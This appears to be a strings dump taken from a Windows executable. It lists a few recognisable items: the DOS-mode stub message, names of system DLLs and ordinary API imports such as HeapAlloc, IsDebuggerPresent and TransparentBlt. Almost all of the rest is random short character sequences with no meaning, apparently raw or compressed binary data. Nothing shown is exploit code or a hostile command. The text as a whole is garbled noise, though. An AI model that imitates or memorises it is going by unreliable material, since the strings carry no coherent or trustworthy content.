g"hx\:"hm
GKb	%.
gKR:qND&
g,U!Pjb
?g}x -iL
GxJ>x!Z
h0h\Rh9L
h1BhgbhT
h1M@hS
h2.dlU
h2hm~o
H3`hBh
h3]oPh
h5@h/el
h^5k h
h%*5mU
h6AH{kd
h7Bht h
h7"h#=
"h/Bh?7I
hBhF#|
hbhWjv+
hbhzF"h
h	]:(c
hc1]9H
"hdABh#phrh
hDjRh"h<
h\Dm2h
hD}M}6
HeapAlloc
HeapDestroy
Hf;rbL
hfyGk"h
|}@h?F}z
hGEa h=
hGo-vT
"h=[`h
h@h<16
h@h6>A
h(hbhFbhd
h> h@h3
h@h hph2h
h@h@hSD
hhN hS
h@hO9ph
h$-hph
h@h\rh
^`h$I8
hIdjrh
h+#IS^
hisljlw
@hJ{k&
hj:&W:l`h
hL\0h_
hL/Yy^FN
hn0h6RhI
hn!%]@T
h(OX3S?
hPh0hPh
 hPh/8x
hph-Cc&
hpheBh
h-.Phl
"hq[31
"hRh9h
h	,RhAak
h>rh[`h
hrh.j/[
"hRh;jK|
H#Rhph
hrh]Rh
hrh<ZQ!
hS1)Rh*3
hTk> hQ
h>T=m9
h+Tq2h
htX]ph
h[)	Uv
hvBh9*
hVdCE\
hW`h/,o{s
 hX&bh
;:@hX=c
h-XPhY
h*/~xV
hXY|	K
@h-[ybh
h*Yrhbh\
"h?z3Bh|V
h\Z h9Jg
I'3"hrhQ
IBhEphZ~
InterlockedExchange
IsDebuggerPresent
;I+][v
j1e6>5
j\4'C]
JBhz@h
jE31Ph
}jFxc|
JKI6qi
-JR&[)
JRhsE%2h
;*]k~)
K|}2;s^(
^k}9^@h<
KERNEL32.dll
Kg}$E]TI
k%''JH
ko!^sc
KY<E <
\]l0>b
L0hET]
*l\4e*c
~l8P=9N
L+]b4e
l@hH"h
=.LnC<
lstrlenA
lstrlenW
m?"HGJA
m:l1;J-
m N#}E
(MO#{Q
MSIMG32.dll
mt6wZYU
MultiByteToWideChar
(Mw`hJ@h
mWzTN h
Myyu0V
N4}/qGCu
)n6}%tq
nBh+<x	
n@hGph
N~|I)S$
nKbdeU
nKwh_I
NM>Bh|
NnSIFr
No3Ex1oR
<n,Q7w
n|_W/4
]nZ62 
o,7@HU
O7S3	1
o-9"hy
&(O9x1
OBlcn0
OC"b$$
oc"hFN
O[F3VXv
Og/GV&<CH1
O#]:h!#
o&"hON
ohs:s+P
ole32.dll
oM`hPhS
o~	Np`
os,OlC
oy3y0Z
p^Cz\W^
P,Dq[z<HCY
ph0hRh
PhbhI!
PhC5"h
phdph;l
PhK(dZ(
phrh)9TF
phyPhX
p:J|4$e2
PPPPPP
ProgIDFromCLSID
^~=Q0Q
q2aE]/
q2h@hI
;Q4gfqV
qb)r;C1
QCe0h2h
QFHrl(
=!q<L]
qm&NFm
q?|#Rh
r95TXB
RaiseException
.reloc
rh'drh
rh hho)
rh`hK6
rh	"hxj
rhJ1?i
rhkZl5
Rhl{,2h
RhNZ hc
rhphPh"h
rhphWgRhx
%'RsKI
rU9rz\
SetUnhandledExceptionFilter
sHES2h
sob62U
sQp#69
StringFromCLSID
SXhAkY[
sZsXwN,
SZzRhx
t3 F_(
t3^=@h
=t45Z$
t[5;5W
,$T5O'
TD M3=
TerminateProcess
T h0hy
!This program cannot be run in DOS mode.
tItIV[
tLmZS@
t)n	^Dah
"]]TQ9mZO
TransparentBlt
T,u0hL
tUvL[D
;tw!aB
:t$:	Y
u	3}qH
U6"h0h
$&U^#a
u	C]4(
u.CiyR0
uGGjf	_
U`hI(m
Ui1C@h
u%	k'#Jw
UnhandledExceptionFilter
uPh92hph$
#Uph(V=[Ph
-,Urh?
'V'{+-
V0r_='
V1Ghhph3[}
(#vE&B
V@hn9.
VS0p%A
vx@r55
VXyMPh]%|
&#:.|w
\w8`hii/]
=Wa\JF
wc8Old
wGN	>|
W"h\Bh
w#H-Ey
WideCharToMultiByte
WKD$\j
Wm}cOK
W{}%,V
WW#Eg*^
WZDBhiX
XARhRh
X[BhN5,
XG!uRh
>$x@hF
x$ h h<
[Xk"h(
x{O/Q>E
xpE_gL
,/XrI<
X`\$RM`
Xr;o*-
x'xn-t
X-z,ph
{y2hvd
y%cjRhJ
yhi(:	^
Yn30#4SX
YN;vuQH
 y,{uw5	
Yw*u h
/Z^4rh
Z)|d&p#
ze&U$rhs
_zfrhY
zg?s7N
Z\l_\&
,z,Ojt
zS%EwS